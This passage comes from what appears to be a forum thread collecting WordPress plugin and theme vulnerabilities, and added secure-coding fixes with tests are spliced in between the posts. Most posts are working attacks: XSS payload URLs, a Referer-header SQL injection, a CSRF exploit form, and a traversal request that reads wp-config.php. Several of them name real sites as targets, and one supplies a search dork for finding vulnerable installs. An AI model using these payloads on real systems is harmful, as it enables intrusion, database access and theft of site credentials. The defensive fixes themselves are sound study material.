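// Constructed inputs: the exploit's padded list, a plain list, an array, 'auto', and a real name.
check(sanitize_charset(str_pad('', 140000, 'UTF-8,')) === null, 'padded list rejected');
check(sanitize_charset('ISO-8859-1,ISO-8859-1') === null, 'two-entry list rejected');
check(sanitize_charset(['UTF-8']) === null, 'array rejected');
check(sanitize_charset('auto') === null, 'auto rejected');
check(sanitize_charset('utf-8') === 'utf-8', 'known name accepted regardless of case');
check(convert_trackback_field("caf\xE9", sanitize_charset('ISO-8859-1')) === "caf\u{e9}", 'latin-1 converted');
check(convert_trackback_field("caf\u{e9}", sanitize_charset('UTF-8,UTF-8')) === "caf\u{e9}", 'rejected list falls back to blog charset');
echo "all checks passed\n";
```

Common aliases such as `latin1` are not in `mb_list_encodings()` and will be refused; if a site needs them, add an explicit alias map in front of the lookup rather than loosening the pattern.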
  13. Techn0id

    WordPress Google Analytics Plugin 3.x

    Code:
    http://localhost/wp/?s=</script><script>alert(0)</script>
    http://localhost/wp/?s=");alert(0);document.write("
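The second PoC URL above is the interesting one: the search term ends up inside a `<script>` block, which is a JavaScript-string context, and HTML escaping is the wrong tool there. The following is an added example, not the Google Analytics plugin's code: the value is emitted as a JSON literal with the HEX flags, which neutralises both the quote breakout and the `</script>` breakout. The `_gaq.push` line is a stand-in for whatever the plugin actually emits, not taken from it. PHP 8 is assumed.

```php
<?php
// Added example (not plugin code): JavaScript-string context escaping.
declare(strict_types=1);

/** Encode a PHP string as a JavaScript string literal that is safe inside <script>. */
function js_string(string $v): string {
    return json_encode(
        $v,
        JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT
        | JSON_INVALID_UTF8_SUBSTITUTE | JSON_THROW_ON_ERROR
    );
}

/** A tracking call with the search term embedded as data, never as markup (assumed shape). */
function tracking_snippet(string $searchTerm): string {
    return "<script>\n_gaq.push(['_trackEvent', 'search', " . js_string($searchTerm) . "]);\n</script>";
}

function check(bool $ok, string $what): void {
    if (!$ok) {
        throw new RuntimeException("check failed: $what");
    }
}

// Constructed inputs: the two ?s= payloads from the post above.
check(js_string('");alert(0);document.write("') === '"\u0022);alert(0);document.write(\u0022"',
      'double quote is hex-escaped');
check(js_string('</script><script>alert(0)</script>')
      === '"\u003C\/script\u003E\u003Cscript\u003Ealert(0)\u003C\/script\u003E"',
      'angle brackets are hex-escaped');
$snippet = tracking_snippet('</script><script>alert(0)</script>');
check(!str_contains($snippet, '</script><script>'), 'no early script close');
check(substr_count($snippet, '</script>') === 1, 'only our own closing tag remains');
echo $snippet, "\n";
```

The HEX flags matter because the HTML parser runs before the JavaScript parser: a literal `</script>` inside a JS string still terminates the element, but `\u003C/script\u003E` is inert to the HTML parser and decodes to the same text once the script executes.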
     
  14. HAXTA4OK

    Path disclosure in the cforms plugin; in fact, whichever file you open there directly, you get a disclosure

    file: cforms-captcha.php
    PHP:
    $im_bg_url = 'captchabg/' . ( prep($_REQUEST['b'],'1.gif') );
    ///// and then the broken getimagesize call
    $image_data=getimagesize($im_bg_url); 
    example: http://www.sakeservices.com/wp-content/plugins/cforms/cforms-captcha.php?b=1'
     
  15. HAXTA4OK

    xcloner plugin

    phpinfo()

    file /restore/XCloner.php

    PHP:
    switch ($_REQUEST[task]) {
      case 'step2':
         step2();
         break;
      case 'step1':
         step1();
         break;
      case 'getinfo':
         getPHPINFO();
         break;
      case 'info':
         echo phpinfo();
         break;
      default :
         start();
         break;
      }

    __http://www.hellboysword.com/wp-content/plugins/xcloner/restore/XCloner.php?task=info
     
    #135 HAXTA4OK, 21 Dec 2009
    Last edited: 21 Dec 2009
  16. chekist

    nsx-referers plugin


    /wp-content/plugins/nsx-referers/nsx-referers-stat.php

    PHP:
    .......

    $referer = $_SERVER['HTTP_REFERER'];
    $ref_arr = parse_url("$referer");

    .......

    $res_query = urldecode($ref_arr['query']);
    if (preg_match("/{$hosts[$host]}(.*?)&/si",$res_query."&",$matches))
    {
      $search = $matches[1];
    }

    if ($wpdb->rows_affected < 1)
        $wpdb->query("INSERT INTO ".REFTABLE." VALUES ('', '$url', 'NULL', 'NULL', '$search', 1)");

    in the Referer we send http://yandex.ru/yandsearch?text=wp%27,1),(0x00,0x2f,0x00,0x00,user(),1)%23&lr=6
     
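The plugin above interpolates the search term taken from the Referer header straight into an INSERT. The following is an added example, not the plugin's code, that does the same referer-statistics bookkeeping with prepared statements, run against an in-memory SQLite table so it executes without WordPress or MySQL. In a plugin the equivalent is `$wpdb->query($wpdb->prepare("INSERT ... VALUES (%s, %s, ...)", $url, $search))`. The table layout, the `SEARCH_HOSTS` map and the page URL are assumptions for the example; the Referer value is the one from the post.

```php
<?php
// Added example (not plugin code): the referer insert with bound parameters.
declare(strict_types=1);

/** Search engines we recognise, keyed by host, with the query parameter carrying the term (assumed). */
const SEARCH_HOSTS = ['yandex.ru' => 'text', 'www.google.com' => 'q'];

/** Pull host and search term out of a Referer header, or null if it is not a known engine. */
function search_term_from_referer(string $referer, int $maxLen = 200): ?array {
    $p = parse_url($referer);
    if ($p === false || !isset($p['host'], $p['query'])) {
        return null;
    }
    $host = strtolower($p['host']);
    if (!array_key_exists($host, SEARCH_HOSTS)) {
        return null;
    }
    parse_str($p['query'], $params);                   // one decoding pass, like urldecode() above
    $term = $params[SEARCH_HOSTS[$host]] ?? null;
    if (!is_string($term) || $term === '') {
        return null;
    }
    return ['host' => $host, 'term' => mb_substr($term, 0, $maxLen)];
}

/** Throw-away table standing in for REFTABLE. */
function referer_table(): PDO {
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE ref_stat (id INTEGER PRIMARY KEY, url TEXT, host TEXT, search TEXT, hits INTEGER)');
    return $db;
}

/** Bump the counter, inserting on first sight; every value travels as a bound parameter. */
function record_referer(PDO $db, string $url, string $referer): bool {
    $hit = search_term_from_referer($referer);
    if ($hit === null) {
        return false;
    }
    $args = [':url' => $url, ':host' => $hit['host'], ':s' => $hit['term']];
    $upd = $db->prepare('UPDATE ref_stat SET hits = hits + 1 WHERE url = :url AND host = :host AND search = :s');
    $upd->execute($args);
    if ($upd->rowCount() < 1) {
        $ins = $db->prepare('INSERT INTO ref_stat (url, host, search, hits) VALUES (:url, :host, :s, 1)');
        $ins->execute($args);
    }
    return true;
}

function check(bool $ok, string $what): void {
    if (!$ok) {
        throw new RuntimeException("check failed: $what");
    }
}

// Constructed run: the Referer from the post, sent twice, then an unknown host.
$db  = referer_table();
$ref = 'http://yandex.ru/yandsearch?text=wp%27,1),(0x00,0x2f,0x00,0x00,user(),1)%23&lr=6';
check(record_referer($db, '/post-1', $ref), 'first hit recorded');
check(record_referer($db, '/post-1', $ref), 'second hit recorded');
$rows = $db->query('SELECT search, hits FROM ref_stat')->fetchAll(PDO::FETCH_ASSOC);
check(count($rows) === 1 && (int) $rows[0]['hits'] === 2, 'one row, two hits');
check($rows[0]['search'] === "wp',1),(0x00,0x2f,0x00,0x00,user(),1)#", 'payload stored as inert text');
check(!record_referer($db, '/post-1', 'http://example.org/?q=x'), 'unknown host ignored');
echo "all checks passed\n";
```

The quote and the `#` survive into the stored row as plain text, which is the point: with bound parameters the database never sees them as syntax, so there is nothing for the statement to break out of.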
  17. [Raz0r]

    http://www.milw0rm.com/exploits/3095

    that's a really old one
     
  18. total90

    WordPress - Amcaptcha plugin ( amcaptcha.php ) <= 1.5 CSRF

    The bug is in the code of this function:

    PHP:
    function comment_post ($id){
        global $user_ID;
        global $langs;

        $texts = $langs[get_option('ac_lang')];

        if ($user_ID)
            return $id;

        if ($_POST[$_SESSION['amcaptcha_session']] != '1'){
            wp_delete_comment($id);
            echo "<strong>".$texts['error']."</strong><br/><br/>".$_POST['comment'];
            exit;
        }
    }
    more precisely:

    PHP:
    if ($_POST[$_SESSION['amcaptcha_session']] != '1'){
        wp_delete_comment($id);
        echo "<strong>".$texts['error']."</strong><br/><br/>".$_POST['comment'];
        exit;
    }
    If the user didn't send this module's session value (more precisely, didn't tick the checkbox
    "I confirm that I am not a spam bot"), the module shows an error and, while doing so, does not
    filter $_POST['comment'] at all.

    The exploit itself looks like this:
    Code:
    <html>
    <head>
    <title>WordPress - Amcaptcha plugin ( amcaptcha.php ) <= 1.5 CSRF
    Exploit</title>
    <!--
    Vulnerability found by total90, exploit written by Dr.TRO
    -->
    </head>
    <body>
    <form action="http://[Домен][Путь к WP]wp-comments-post.php" method="post"
    name="commentform">
    <input type="hidden" name="author" value="Dr.TRO" />
    <input type="hidden" name="email" value="[email protected]" />
    <input type="hidden" name="comment" value="[Уязвимое место]" />
    <input type="hidden" name="comment_post_ID" value="[ID существующего
    поста]" />
    <input type="submit" name="submit" value="Request" />
    </form>
    </body>
    </html>
    
    Code analysis and exploit by Dr.TRO
    Google dork: Для того, чтобы иметь возможность комментировать, включите
    JavaScript в Вашем браузере.
     
    #138 total90, 4 Apr 2010
    Last edited: 5 Apr 2010
  19. RulleR

    WordPress Plugin [jRSS Widget] File Disclosure Vulnerability

    Plugin name: jRSS Widget (download)
    Version: 1.0

    File Disclosure

    Vuln file: /wp-content/plugins/jrss-widget/proxy.php
    PHP:
    header('Content-type: application/xml');
    $handle = fopen($_REQUEST['url'], "r");

    if ( $handle ) {
        while ( !feof($handle) ) {
            $buffer = fgets($handle, 4096);
            echo $buffer;
        }
        fclose($handle);
    }
    Exploit:
    Code:
    POST http://[host]/[path]/wp-content/plugins/jrss-widget/proxy.php HTTP/1.0
    Content-type: application/x-www-form-urlencoded
    
    url=../../../wp-config.php
     
    #139 RulleR, 30 May 2010
    Last edited: 30 May 2010
  20. total90

    Wordpress 2.9.2 Passive XSS

    Search.php

    Let me say up front that this vulnerability is not present in all WP themes.

    Let's look at the Simple Balance theme

    search.php:
    PHP:
    <?php include (TEMPLATEPATH . '/header.php'); ?>

        <div id="page">

            <?php
            if (!isset($theme_options["layout_style"]) || $theme_options["layout_style"] == "scs") {
                include (TEMPLATEPATH . '/lsidebar.php');
            }
            ?>

            <div id="content">

                <?php include (TEMPLATEPATH . '/topads.php'); ?>

                <h4 class="archiveTitle">Результаты поиска <strong>'<?php echo $s?>'</strong></h4>

            <?php if (have_posts()) : ?>
                <?php while (have_posts()) : the_post(); ?>
                <div class="post">
                    <div class="postTitle"><h2><a href="<?php the_permalink() ?>" rel="bookmark" title="<?php the_title(); ?>"><?php the_title(); ?></a></h2></div>
                    <div class="postInfo">Опубликовано <?php the_time('d.m.Y'); ?> в рубрике <?php the_category(', '); ?> <?php edit_post_link('изменить', '(', ')'); ?></div>

                    <div class="postContent">
                    <?php the_excerpt(); ?>
                    </div>

                    <?php if(function_exists('the_tags')) { ?><div class="postExtras"><strong>Метки:</strong> <?php the_tags('', ', ', ''); ?></div><?php } ?>

                    <div class="postMeta">
                        <span class="postLink"><a href="<?php the_permalink() ?>" title="<?php the_title(); ?>">Читать пост</a></span>
                        <?php
                        $comNo = get_comment_type_count('comment'); // Checking if there are any actual comments (trackbacks and pingbacks excluded)

                        if ($comNo == 1) {
                        ?>
                        <span class="postComments"><?php comments_popup_link('Прокомментируете?', 'Один комментарий', 'Комментариев '.$comNo.''); ?></span>
                        <?php }
                        elseif ($comNo > 1) {
                        ?>
                        <span class="postComments"><?php comments_popup_link('Прокомментируете?', 'Один комментарий', 'Комментариев '.$comNo.''); ?></span>
                        <?php }
                        else {
                        ?>
                        <span class="postComments"><?php comments_popup_link('Прокомментируете?', 'Прокомментируете?', 'Прокомментируете?'); ?></span>
                        <?php } ?>
                    </div>
                </div>
                <?php endwhile; ?>

                <div class="navigation">
                    <div class="left"><?php previous_posts_link('&laquo; В будущее'); ?></div>
                    <div class="right"><?php next_posts_link('В прошлое &raquo;'); ?></div>
                </div>

                <?php else: ?>
                Ничего не найдено.<br />
                Извините, по вашему запросу ничего не найдено. Возможно, вам стоит изменить параметры поиска?
                <?php endif; ?>
            </div>

            <?php
            if (isset($theme_options["layout_style"]) && $theme_options["layout_style"] == "css") {
                include (TEMPLATEPATH . '/lsidebar.php');
            }
            ?>

            <?php include (TEMPLATEPATH . '/rsidebar.php'); ?>

        </div>

    <?php include (TEMPLATEPATH . '/footer.php'); ?>

    we're only interested in:
    PHP:
    <h4 class="archiveTitle">Результаты поиска <strong>'<?php echo $s?>'</strong></h4>
    As we can see, the script outputs the $s parameter without filtering it at all.
    So if you pass the script JS code inside a <script> tag, it will execute.

    Exploitation: [host]/[path]/?s=[xss]
    Example: http://seocekret.ru/?s=<script>alert()</script>
     
    #140 total90, 6 Jun 2010
    Last edited: 7 Jun 2010